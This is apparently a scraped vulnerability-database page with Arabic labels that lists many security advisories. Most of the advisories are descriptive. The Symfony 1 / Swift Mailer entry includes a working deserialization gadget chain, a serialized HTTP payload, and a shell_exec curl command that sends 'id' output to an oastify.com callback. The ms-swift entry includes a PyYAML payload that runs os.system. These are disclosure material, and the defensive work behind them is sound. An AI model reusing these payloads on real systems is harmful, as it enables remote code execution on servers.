31, 2018. ### PoC So we need the following object to trigger an OS command like `shell_exec("curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)");`: ```php object(Swift_KeyCache_DiskKeyCache)#88 (4) { ["_stream":"Swift_KeyCache_DiskKeyCache":private]=> NULL ["_path":"Swift_KeyCache_DiskKeyCache":private]=> string(25) "thispathshouldneverexists" ["_keys":"Swift_KeyCache_DiskKeyCache":private]=> object(sfOutputEscaperArrayDecorator)#89 (3) { ["count":"sfOutputEscaperArrayDecorator":private]=> NULL ["value":protected]=> array(1) { [1]=> string(66) "curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)" } ["escapingMethod":protected]=> string(10) "shell_exec" } ["_quotes":"Swift_KeyCache_DiskKeyCache":private]=> bool(false) } ``` We craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before: * gadgets.php: ```php class Swift_KeyCache_DiskKeyCache { private $_path; private $_keys = array(); public function __construct($keys, $path) { $this->_keys = $keys; $this->_path = $path; } } class sfOutputEscaperArrayDecorator { protected $value; protected $escapingMethod; public function __construct($escapingMethod, $value) { $this->escapingMethod = $escapingMethod; $this->value = $value; } } ``` * chain.php: ```php namespace GadgetChain\Symfony; class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall { public static $version = '1.3.0 < 1.5.15'; public static $vector = '__destruct'; public static $author = 'darkpills'; public static $information = 'Based on Symfony 1 and Swift mailer in Symfony\'s vendor'; public function generate(array $parameters) { $cacheKey = "1"; $keys = new \sfOutputEscaperArrayDecorator($parameters['function'], array($cacheKey => $parameters['parameter'])); $path = "thispathshouldneverexists"; $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path); return $cache; } } ``` And trigger the deserialization with an HTTP request like the following on a dummy test controller: ```http POST /frontend_dev.php/test/index HTTP/1.1 Host: localhost:8001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 532 user=a%3A2%3A%7Bi%3A7%3BO%3A27%3A%22Swift_KeyCache_DiskKeyCache%22%3A2%3A%7Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_path%22%3Bs%3A25%3A%22thispathshouldneverexists%22%3Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_keys%22%3BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A1%3Bs%3A66%3A%22curl+https%3A%2F%2Fh0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7Di%3A7%3Bi%3A7%3B%7D ``` Note that CVSS score is not applicable to this kind of vulnerability. ### Impact The attacker can execute any PHP command which leads to remote code execution. ### Recommendation As with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake? In this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed Or if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed

الإصدارات المتأثرة

v1.5.0, v1.5.1, v1.5.10, v1.5.11, v1.5.12

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

Directory Traversal vulnerability in React Native Document Picker before 8.2.2 and 9.x before 9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.

الإصدارات المتأثرة

9.0.0 - 9.1.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H

المراجع

الوصف الكامل

SwiftyEdit Content Management System prior to v1.2.0 is vulnerable to Cross Site Request Forgery (CSRF).

الإصدارات المتأثرة

v1.0.0, v1.1.0, v1.1.2

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed. Abuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open. The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately. The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth. In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client. Multiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows. ## swift-nio-http2 specific advisory swift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress. swift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H

المراجع

الوصف الكامل

Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 8.1.0.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

In JetBrains Kotlin before 1.4.21, a vulnerable Java API was used for temporary file and folder creation. An attacker was able to read data from such files and list directories due to insecure permissions.

الإصدارات المتأثرة

All versions < deploy, 0.10.1316, 0.10.195, 0.10.4

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

The OpenStack Python client library for Swift (python-swiftclient) from 1.0 before 2.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

الإصدارات المتأثرة

1.0, 1.1.1, 1.2.0, 1.3.0, 1.4.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.

الإصدارات المتأثرة

4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

In JetBrains Kotlin before 1.6.0, it was not possible to lock dependencies for Multiplatform Gradle Projects.

الإصدارات المتأثرة

All versions < deploy, 0.10.1316, 0.10.195, 0.10.4

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

APKLeaks prior to v2.0.4 allows remote authenticated attackers to execute arbitrary OS commands via package name inside the application manifest. ### Impact An authenticated attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified, or could cause other unintended behavior through malicious package names. ### References - a966e781499ff6fd4eea66876d7532301b13a382 ### For more information If you have any questions or comments about this advisory: * Email me at [me@dw1.io](mailto:me@dw1.io)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

المراجع

الوصف الكامل

In OpenStack Swift prior to 2.15.2, the proxy-server logs full tempurl paths, potentially leaking reusable tempurl signatures to anyone with read access to these logs. All Swift deployments using the tempurl middleware are affected.

الإصدارات المتأثرة

1.0.2

المراجع

الوصف الكامل

Versions of `@ionic/core` prior to 4.0.3, 4.1.3, 4.2.1 or 4.3.1 are vulnerable to Cross-Site Scripting (XSS). The package uses the unsafe `innerHTML` function without sanitizing input, which may allow attackers to execute arbitrary JavaScript on the victim's browser. This issue affects the components: - `<ion-alert>.message` - `<ion-searchbar>.placeholder` - `<ion-infinite-scroll-content>.loadingText` - `<ion-refresher-content>.pullingText` - `<ion-refresher-content>.refershingText` ## Recommendation - If you are using @ionic/core 4.0.x, upgrade to 4.0.3 or later. - If you are using @ionic/core 4.1.x, upgrade to 4.1.3 or later. - If you are using @ionic/core 4.2.x, upgrade to 4.2.1 or later. - If you are using @ionic/core 4.3.x, upgrade to 4.3.1 or later.

المراجع

الوصف الكامل

Affected versions of `apk-parser3` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser3`. ## Recommendation Update to version 0.1.3 or greater.

المراجع

الوصف الكامل

apk-parser is a tool to extract Android Manifest info from an APK file. apk-parser versions below 0.1.6 download binary resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested binary with an attacker controlled binary if the attacker is on the network or positioned in between the user and the remote server. ## Recommendation Update to version 0.1.6 or later.

المراجع

الوصف الكامل

JHipster Kotlin is using an insecure source of randomness to generate all of its random values. JHipster Kotlin relies upon apache commons lang3 `RandomStringUtils`. From the documentation: > Caveat: Instances of Random, upon which the implementation of this class relies, are not cryptographically secure. > \- https://commons.apache.org/proper/commons-lang/javadocs/api-3.9/org/apache/commons/lang3/RandomStringUtils.html Here are the examples of JHipster Kotlin's use of an insecure PRNG: https://github.com/jhipster/jhipster-kotlin/blob/193ae8f13c0be686f9687e78bacfedb144c47d8c/generators/server/templates/src/main/kotlin/package/service/util/RandomUtil.kt.ejs#L32 ## Proof Of Concepts Already Exist There has been a POC of taking one RNG value generated `RandomStringUtils` and reversing it to generate all of the past/future RNG values public since March 3rd, 2018. https://medium.com/@alex91ar/the-java-soothsayer-a-practical-application-for-insecure-randomness-c67b0cd148cd POC Repository: https://github.com/alex91ar/randomstringutils ## Potential Impact Technical All that is required is to get one password reset token from a JHipster Kotlin generated service and using the POC above, you can reverse what all future password reset tokens to be generated by this server. This allows an attacker to pick and choose what account they would like to takeover by sending account password reset requests for targeted accounts. ## Potential Impact Scale Not as large as for the original jhipster project as the kotlin blueprint is not that widely used. ### Patches Update your generated applications to > 1.2.0 ### Workarounds Change the content of `RandomUtil.kt` like this: ```kotlin import java.security.SecureRandom import org.apache.commons.lang3.RandomStringUtils private const val DEF_COUNT = 20 object RandomUtil { private val secureRandom: SecureRandom = SecureRandom() init { secureRandom.nextBytes(byteArrayOf(64.toByte())) } private fun generateRandomAlphanumericString(): String { return RandomStringUtils.random(DEF_COUNT, 0, 0, true, true, null, secureRandom) } /** * Generate a password. * * @return the generated password. */ fun generatePassword(): String = generateRandomAlphanumericString() } ``` Important is to exchange **every** call of `RandomStringUtils.randomAlphaNumeric`. ### For more information If you have any questions or comments about this advisory: * Open an issue in [JHipster Kotlin](https://github.com/jhipster/jhipster-kotlin)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

### Impact We log the mail for invalid password reset attempts. As the email is provided by a user and the api is public this can be used by an attacker to forge log entries. This is vulnerable to https://cwe.mitre.org/data/definitions/117.html This problem affects only application generated with jwt or session authentication. Applications using oauth are not vulnerable. ### Patches version 1.7.0. ### Workarounds In `AccountResource.kt` you should change the line ```kotlin log.warn("Password reset requested for non existing mail '$mail'"); ``` to ```kotlin log.warn("Password reset requested for non existing mail"); ``` ### References * https://cwe.mitre.org/data/definitions/117.html * https://owasp.org/www-community/attacks/Log_Injection * https://www.baeldung.com/jvm-log-forging ### For more information If you have any questions or comments about this advisory: * Open an issue in [jhipster kotlin](https://github.com/jhipster/jhipster-kotlin)

الإصدارات المتأثرة

1.6.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

## Description A Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`. If an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution. ## Affected Repository - **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift) - **Affect versions:** latest - **File:** `tests/run.py` - **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420 - **Dependency:** PyYAML <= 5.3.1 ## Vulnerable Code ```python if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding='utf-8') as f: run_config = yaml.load(f, Loader=yaml.FullLoader) ``` ## Proof of Concept (PoC) ### Step 1: Create malicious YAML file (`exploit.yaml`) ```yaml !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('mkdir HACKED')" ``` ### Step 2: Execute with vulnerable PyYAML (<= 5.3.1) ```python import yaml with open("exploit.yaml", "r") as f: cfg = yaml.load(f, Loader=yaml.FullLoader) ``` This results in execution of `os.system`, proving code execution. ## Mitigation * Replace `yaml.load()` with `yaml.safe_load()` * Upgrade PyYAML to version 5.4 or later ### Example Fix: ```python # Before yaml.load(f, Loader=yaml.FullLoader) # After yaml.safe_load(f) ``` ## Author * Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩) * Contact: *\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*

الإصدارات المتأثرة

5.1, 5.1.1, 5.1.2, 5.2b1, 5.2

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

Affected versions of `apk-parser2` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser2`. ## Recommendation No patch is currently available for this vulnerability, and the package has not been updated since 2014. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع